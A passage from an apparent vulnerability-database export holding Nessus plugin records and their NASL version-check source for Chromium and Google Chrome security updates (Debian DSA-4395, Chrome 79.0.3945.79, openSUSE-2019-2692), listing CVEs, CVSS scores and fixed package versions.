input validation error in\n the developer tools.\n\n - CVE-2019-5784\n Lucas Pinheiro discovered an implementation error in the\n v8 JavaScript library.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5757\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5758\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5760\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5766\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2019-5768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5770\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5774\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5776\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5779\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5780\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5782\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5783\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4395\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 72.0.3626.96-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5783\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"chromedriver\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-driver\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-l10n\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-shell\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-widevine\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:34:00", "description": "The version of Google Chrome installed on the remote Windows host is prior to 79.0.3945.79. It is, therefore, affected by multiple vulnerabilities as referenced in the 2019_12_stable-channel-update-for-desktop advisory. 
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "nessus", "title": "Google Chrome < 79.0.3945.79 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_79_0_3945_79.NASL", "href": 
"https://www.tenable.com/plugins/nessus/131954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131954);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2019-13725\",\n \"CVE-2019-13726\",\n \"CVE-2019-13727\",\n \"CVE-2019-13728\",\n \"CVE-2019-13729\",\n \"CVE-2019-13730\",\n \"CVE-2019-13732\",\n \"CVE-2019-13734\",\n \"CVE-2019-13735\",\n \"CVE-2019-13736\",\n \"CVE-2019-13737\",\n \"CVE-2019-13738\",\n \"CVE-2019-13739\",\n \"CVE-2019-13740\",\n \"CVE-2019-13741\",\n \"CVE-2019-13742\",\n \"CVE-2019-13743\",\n \"CVE-2019-13744\",\n \"CVE-2019-13745\",\n \"CVE-2019-13746\",\n \"CVE-2019-13747\",\n \"CVE-2019-13748\",\n \"CVE-2019-13749\",\n \"CVE-2019-13750\",\n \"CVE-2019-13751\",\n \"CVE-2019-13752\",\n \"CVE-2019-13753\",\n \"CVE-2019-13754\",\n \"CVE-2019-13755\",\n \"CVE-2019-13756\",\n \"CVE-2019-13757\",\n \"CVE-2019-13758\",\n \"CVE-2019-13759\",\n \"CVE-2019-13761\",\n \"CVE-2019-13762\",\n \"CVE-2019-13763\",\n \"CVE-2019-13764\"\n );\n\n script_name(english:\"Google Chrome < 79.0.3945.79 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 79.0.3945.79. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2019_12_stable-channel-update-for-desktop advisory. 
Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5e80c206\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025067\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1027152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/944619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1024758\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025489\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1028862\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1023817\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025468\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1028863\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1020899\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1013882\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1017441\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/824715\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1005596\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1011950\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1017564\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/754304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/853670\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://crbug.com/990867\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/999932\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1018528\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/993706\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1010765\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025464\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025470\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025471\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/442579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/696208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/708595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/884693\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/979441\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/901789\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1002687\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1004212\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1011600\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1032080\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 79.0.3945.79 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13725\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'79.0.3945.79', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:32:05", "description": "This update for chromium fixes the following issues :\n\nChromium was updated to 79.0.3945.79 (boo#1158982)	 \n\n - CVE-2019-13725: Fixed a use after free in Bluetooth\n\n - CVE-2019-13726: Fixed a heap buffer overflow in password manager\n\n - CVE-2019-13727: Fixed an insufficient policy enforcement in WebSockets\n\n - CVE-2019-13728: Fixed an out of bounds write in V8\n\n - CVE-2019-13729: Fixed a use after free in WebSockets\n\n - CVE-2019-13730: Fixed a type Confusion in V8\n\n - CVE-2019-13732: Fixed a use after free in WebAudio\n\n - CVE-2019-13734: Fixed an out of bounds write in 
SQLite\n\n - CVE-2019-13735: Fixed an out of bounds write in V8\n\n - CVE-2019-13764: Fixed a type Confusion in V8\n\n - CVE-2019-13736: Fixed an integer overflow in PDFium\n\n - CVE-2019-13737: Fixed an insufficient policy enforcement in autocomplete\n\n - CVE-2019-13738: Fixed an insufficient policy enforcement in navigation\n\n - CVE-2019-13739: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13740: Fixed an incorrect security UI in sharing\n\n - CVE-2019-13741: Fixed an insufficient validation of untrusted input in Blink\n\n - CVE-2019-13742: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13743: Fixed an incorrect security UI in external protocol handling\n\n - CVE-2019-13744: Fixed an insufficient policy enforcement in cookies\n\n - CVE-2019-13745: Fixed an insufficient policy enforcement in audio\n\n - CVE-2019-13746: Fixed an insufficient policy enforcement in Omnibox\n\n - CVE-2019-13747: Fixed an uninitialized Use in rendering\n\n - CVE-2019-13748: Fixed an insufficient policy enforcement in developer tools\n\n - CVE-2019-13749: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13750: Fixed an insufficient data validation in SQLite\n\n - CVE-2019-13751: Fixed an uninitialized Use in SQLite\n\n - CVE-2019-13752: Fixed an out of bounds read in SQLite\n\n - CVE-2019-13753: Fixed an out of bounds read in SQLite\n\n - CVE-2019-13754: Fixed an insufficient policy enforcement in extensions\n\n - CVE-2019-13755: Fixed an insufficient policy enforcement in extensions\n\n - CVE-2019-13756: Fixed an incorrect security UI in printing\n\n - CVE-2019-13757: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13758: Fixed an insufficient policy enforcement in navigation\n\n - CVE-2019-13759: Fixed an incorrect security UI in interstitials\n\n - CVE-2019-13761: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13762: Fixed an insufficient policy enforcement in downloads\n\n - CVE-2019-13763: Fixed an insufficient policy enforcement in 
payments", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2019-2692)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", 
"p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2692.NASL", "href": "https://www.tenable.com/plugins/nessus/132087", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2692.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132087);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2019-2692)\");\n script_summary(english:\"Check for the openSUSE-2019-2692 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated to 79.0.3945.79 (boo#1158982)	 \n\n - CVE-2019-13725: Fixed a use after free in Bluetooth\n\n - CVE-2019-13726: Fixed a heap buffer overflow in password\n manager\n\n - CVE-2019-13727: Fixed an insufficient policy 
enforcement\n in WebSockets\n\n - CVE-2019-13728: Fixed an out of bounds write in V8\n\n - CVE-2019-13729: Fixed a use after free in WebSockets\n\n - CVE-2019-13730: Fixed a type Confusion in V8\n\n - CVE-2019-13732: Fixed a use after free in WebAudio\n\n - CVE-2019-13734: Fixed an out of bounds write in SQLite\n\n - CVE-2019-13735: Fixed an out of bounds write in V8\n\n - CVE-2019-13764: Fixed a type Confusion in V8\n\n - CVE-2019-13736: Fixed an integer overflow in PDFium\n\n - CVE-2019-13737: Fixed an insufficient policy enforcement\n in autocomplete\n\n - CVE-2019-13738: Fixed an insufficient policy enforcement\n in navigation\n\n - CVE-2019-13739: Fixed an incorrect security UI in\n Omnibox\n\n - CVE-2019-13740: Fixed an incorrect security UI in\n sharing\n\n - CVE-2019-13741: Fixed an insufficient validation of\n untrusted input in Blink\n\n - CVE-2019-13742: Fixed an incorrect security UI in\n Omnibox\n\n - CVE-2019-13743: Fixed an incorrect security UI in\n external protocol handling\n\n - CVE-2019-13744: Fixed an insufficient policy enforcement\n in cookies\n\n - CVE-2019-13745: Fixed an insufficient policy enforcement\n in audio\n\n - CVE-2019-13746: Fixed an insufficient policy enforcement\n in Omnibox\n\n - CVE-2019-13747: Fixed an uninitialized Use in rendering\n\n - CVE-2019-13748: Fixed an insufficient policy enforcement\n in developer tools\n\n - CVE-2019-13749: Fixed an incorrect security UI in\n Omnibox\n\n - CVE-2019-13750: Fixed an insufficient data validation in\n SQLite\n\n - CVE-2019-13751: Fixed an uninitialized Use in SQLite\n\n - CVE-2019-13752: Fixed an out of bounds read in SQLite\n\n - CVE-2019-13753: Fixed an out of bounds read in SQLite\n\n - CVE-2019-13754: Fixed an insufficient policy enforcement\n in extensions\n\n - CVE-2019-13755: Fixed an insufficient policy enforcement\n in extensions\n\n - CVE-2019-13756: Fixed an incorrect security UI in\n printing\n\n - CVE-2019-13757: Fixed an incorrect security UI in\n Omnibox\n\n - 
CVE-2019-13758: Fixed an insufficient policy enforcement\n in navigation\n\n - CVE-2019-13759: Fixed an incorrect security UI in\n interstitials\n\n - CVE-2019-13761: Fixed an incorrect security UI in\n Omnibox\n\n - CVE-2019-13762: Fixed an insufficient policy enforcement\n in downloads\n\n - CVE-2019-13763: Fixed an insufficient policy enforcement\n in payments\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158982\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-79.0.3945.79-lp151.2.51.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-79.0.3945.79-lp151.2.51.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-79.0.3945.79-lp151.2.51.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-79.0.3945.79-lp151.2.51.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debugsource-79.0.3945.79-lp151.2.51.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, 
